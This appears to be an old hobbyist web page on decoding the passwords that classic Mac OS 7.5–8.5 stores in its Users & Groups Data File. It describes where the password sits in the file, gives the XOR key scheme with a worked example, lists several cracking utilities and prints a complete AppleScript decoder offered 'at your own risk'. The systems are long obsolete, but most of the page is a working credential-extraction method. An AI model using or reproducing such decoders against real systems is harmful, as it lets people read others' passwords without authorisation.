StaticUsers.net – Mac OS Encryption

Decrypt-a-tron is a application to decrypt the Apple password algorithm, created by System Coyboy.

macfspwd.c is a .c script to decrypt the apple password algorithm. Created by Nate Pierce. This is a .c document. You can use a compiler or a unix machine to execute it.

Nate Pierce has written a second edition to his macfspwd.c, the apple encryption algorithm. the 2nd revision adds the possibility of running like grep: macfspwd2 [accountname] [users & groups db filename] It currently pulls out all occurrences of the account name in the file, but I’ll look into how to limit it to just the entry with the encrypted password. Later I’ll try to figure out how to read the userlist from the file and extract all passwords. Again, use at your own risk…

Apple.com has setup a conference, or discussion list with Q&A about the Apple Encryption algorithm read it to keep up with the ideas and ways around it. More detailed.

The encryption algorithm in MacOS system is simple and the password can be
easily decoded.

Password is stored in Users & Groups Data File in Preferences folder.
Offset is different on each system and depends on Users & Groups configuration,
but it always lie after owner’s username. It’s not so difficult to find it using
hex editor, even if we don’t know owner’s username.

Here are some examples of encrypted passwords:

00 04 06 18 0D 0A 19 0B = stayaway

0A 1F 10 1B 00 07 75 1E = yellow

1C 1B 16 14 12 62 10 7B = owner

07 02 13 1A 1E 0F 1A 14 = turnpage

27 25 33 27 27 39 24 7E = Trustno1

AA BB CC DD EE FF GG HH = aa bb cc dd ee ff gg hh

where:

AA BB CC DD EE FF GG HH – encrypted password (hex)

aa bb cc dd ee ff gg hh – decrypted password in ASCII codes (hex)

aa=AA XOR 73H

bb=BB XOR AA XOR 70H

cc=CC XOR BB XOR 63H

dd=DD XOR CC XOR 67H

ee=EE XOR DD XOR 74H

ff=FF XOR EE XOR 70H

gg=GG XOR FF XOR 72H

hh=HH XOR GG XOR 6BH

An example:

Let’s take OO 04 06 18 0D 0A 19 0B

00H XOR 73H = 73H = s

04H XOR 00H = 04H; 04H XOR 70H = 74H = t

06H XOR 04H = 02H; O2H XOR 63H = 61H = a

18H XOR 06H = 1EH; 1EH XOR 67H = 79H = y

0DH XOR 18H = 15H; 15H XOR 74H = 61H = a

0AH XOR 0DH = 07H; 07H XOR 70H = 77H = w

19H XOR 0AH = 13H; 13H XOR 72H = 61H = a

0BH XOR 19H = 12H; 12H XOR 6BH = 79H = y

tested on:

MacOS 7.5.3, 7.5.5, 8.1, 8.5

MacOS Pass 2.1 by adix      15.06.99; Apple Script English

global lbin, bit1, bit2, bitk

set hex1 to text returned of (display dialog “Enter encrypted password

(hex): ” default answer “” buttons {” Ok “} default button ” Ok ” with

icon

stop)

set Alicia to

“0111001101110000011000110110011101110100011100000111001001101011”

set pass to “”

set lbin to “”

set razem to “”

set i to 1

set skok to 0

set ile to count items in hex1

if ile = 0 or ile = 1 then

set pass to “”

else

repeat until (i > (ile – 1))

set kodascii to 0

set razem to “”

set zn to items (i) thru (i + 1) in hex1

set lbin to hex2bin(zn)

repeat with a from 1 to 8

set bit1 to item (a + skok) of Alicia

xor(a)

set razem to {razem & bitk} as string

if i < 2 then

set kodascii to {kodascii + bitk * (2 ^ (8 – a))}

end if

end repeat

if i < 2 then

set pass to {pass & (ASCII character kodascii)}

else

set zn to items (i – 2) thru (i – 1) in hex1

set lbin to hex2bin(zn)

repeat with a from 1 to 8

set bit1 to item a of razem

xor(a)

set kodascii to {kodascii + bitk * (2 ^ (8 – a))}

end repeat

set pass to {pass & (ASCII character kodascii)}

end if

set skok to skok + 8

set i to i + 2

end repeat

end if

display dialog “Password:   ” & pass & return & return & “by adix” buttons

{” Ok “} default button ” Ok ” with icon note

on hex2bin(zn)

set temphex to {“0000”, “0001”, “0010”, “0011”, “0100”, “0101”, “0110”,

“0111”, “1000”, “1001”, “1010”, “1011”, “1100”, –

“1101”, “1110”, “1111”}

set t2hex to “0123456789ABCDEF”

set bin to “”

repeat with j in zn

set t1 to j as string

repeat with i from 1 to (count items in t2hex)

if ((item i in t2hex) = t1) then

set temp to (item i in temphex)

exit repeat

end if

end repeat

set bin to {bin & temp} as string

end repeat

return (bin)

end hex2bin

on xor(a)

set bit2 to item a in lbin

if bit1 = bit2 then

set bitk to “0”

else

set bitk to “1”

end if

end xor